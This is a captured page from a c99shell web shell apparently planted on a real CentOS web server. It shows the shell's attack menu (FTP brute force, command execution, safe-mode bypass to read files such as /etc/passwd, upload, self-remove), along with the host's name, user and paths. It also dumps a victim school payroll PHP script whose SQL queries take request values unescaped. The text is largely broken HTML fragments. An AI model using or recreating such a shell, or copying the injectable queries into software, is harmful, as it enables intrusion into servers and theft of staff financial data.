!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/Money_depart/   drwxr-xr-x
Free 52.61 GB of 127.8 GB (41.17%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Show_Dec_Mony.php (15.46 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
";
		echo "

กรุณาทำการ Login ก่อน
";
		echo "";
		exit();
	} 
	else {
		/**  Configuration  */
		require_once( "../configuration.php" );
		require_once( $_Config_absolute_path . "/includes/framework.php" );
	     require_once("../include/Function.php");
	
		/**  Create Database Object  */
		$dbObj = new DBConn;
		
		/**  Config Table for This Page  */
		$myTable = "salary_repot_tb";
		$myTableFK = "Code";
        
		$sql = " SELECT * FROM personal_tb  WHERE Teacher_code='$Teacher_code' ";
		$result1 = mysql_query($sql);
		$rss = mysql_fetch_array($result1);
	
		/**  Paging */
		$page = $_GET['page'];
		if( $page == "" ) { $page = 1; }
			
		/**  จำนวนข้อมูล ต่อ 1 หน้า  */
		$perpage = $_REQUEST['perpage'];
		if( $perpage == "" ) { $perpage = 10; }
		
		/**  Searching */
		$keyword = $_REQUEST['keyword'];
         	/**  Botton Name Action */
		$action = $_REQUEST['action'];
		$id = $_REQUEST['id'];
	
		if( isset($action) && !empty($action) ) {
			switch($action) {
				case "Delete" :
					$num = count($id);
					for( $i=0; $i<$num; $i++ ) {
						//--- tech_plan_tb
						$qrySel = " SELECT *  FROM  $myTable  WHERE  $myTableFK='$id[$i]' ";
						$resultSel = $dbObj->execQuery($qrySel);
						$rsSel = $dbObj->fetchObject($resultSel);
							$Faculty_code = $rsSel->Faculty_code;
						
						$qryDel = " DELETE FROM  $myTable  WHERE $myTableFK='$id[$i]' ";
						$resultDel = $dbObj->runQuery($qryDel);
						$dbObj->freeresult($resultDel);
					
									
					}
				break;
			} # switch
		} # if		


		
	} # else
 ?>





MIS -การเงิน








  

    
    execQuery($query);
		$numrows = $dbObj->_numrows;
		
		/**  Paging  */
		$display = ( !isset ($_GET['page']) ) ? 1 : $_GET['page'];
		$start = ( ($display * $limit) - $limit );
		/**  Paging  */
		
		//###  Search
		if( $keyword != "" ) { 
			if( isset($_GET['OrderBy']) ) {
			
$query = "SELECT * FROM salary_repot_tb  Where  Teacher_code='$Teacher_code'  Order  By   Start_year  DESC  ";
			} 
			elseif( !isset($_GET['OrderBy']) ) {
			
$query = "SELECT * FROM salary_repot_tb  Where  Teacher_code='$Teacher_code'  Order  By   Start_year  DESC  ";
			}
		} 
		else {
			if( isset($_GET['OrderBy']) ) {
$query = "SELECT * FROM salary_repot_tb  Where  Teacher_code='$Teacher_code'  Order  By   Start_year  DESC  ";
			} 
			elseif( !isset($_GET['OrderBy']) ) {
$query = "SELECT * FROM salary_repot_tb  Where  Teacher_code='$Teacher_code'  Order  By   Start_year  DESC  ";
			}
		}
		
		$query .= " LIMIT $start, $limit ";
		$result = $dbObj->execQuery($query);
		

    ?>
      

    

      

        
      

    

    

      

      

        ข้อมูลเงินเดือน รายปีงบประมาณ » แก้ไขประวัติเงินเดือน บุคลากร  
        จำนวนข้อมูลต่อหน้า 
          
      

      

        
          

            

              
            

          

          

            

              
                
              
              
                
               
               0 ) { ?>
              
                  
                  
                  
                  
            

          

           0 ) { ?>
          fetchArray($result)){
				$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF"; 
				
				if( $keyword != "" ) {
					$url = eregi_replace( $keyword, "\\0", $rs->url );
					$description = eregi_replace( $keyword, "\\0", $rs->description );
				}
				else {
					$url = $rs->url;
					$description = $rs->description;
				}
          ?>
            freeresult($result);
          ?>
          

            

              ลำดับ
              เดือน
              ปี งบประมาณ
               เงินเดือน
              รวมรายรับ 
                (บาท) 
              รวมรายจ่าย
              คงเหลือเงินสุทธิ
              Edit
              
              

            

              
               
              
               
              
              
              
              
              
              

            

           0 ) ?>
          
          

        

          
           0 ) { ?>
          

            

                
            

            

                Page : 
                     1) {	
                            $previous = $display - 1;					
                    ?>
bool(false)




:: Command execute ::


Enter:  
Select: 
 






:: Shadow's tricks :D  ::



  

    
Useful Commands 
    

    

      

        
        
          
        
         
        
          

        Warning. Kernel may be alerted using higher levels 

    

    

  

   
Kernel Info: 

      
      
	  
	  
	  
	  
    

    







:: Preddy's tricks :D  ::



  

    
Php Safe-Mode Bypass (Read Files)
    


    

      

      File:  

 eg: /etc/passwd

      
      
      
           
      
      
      	
	
          

      

    

    

  

   
Php Safe-Mode Bypass (List Directories):     

      


      Dir:  

 eg: /etc/


    

    








 
:: Search ::
  - regexp 

 
:: Upload ::
 
[ ok ]






:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]


:: Go Dir ::
 
:: Go File ::
 


--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]--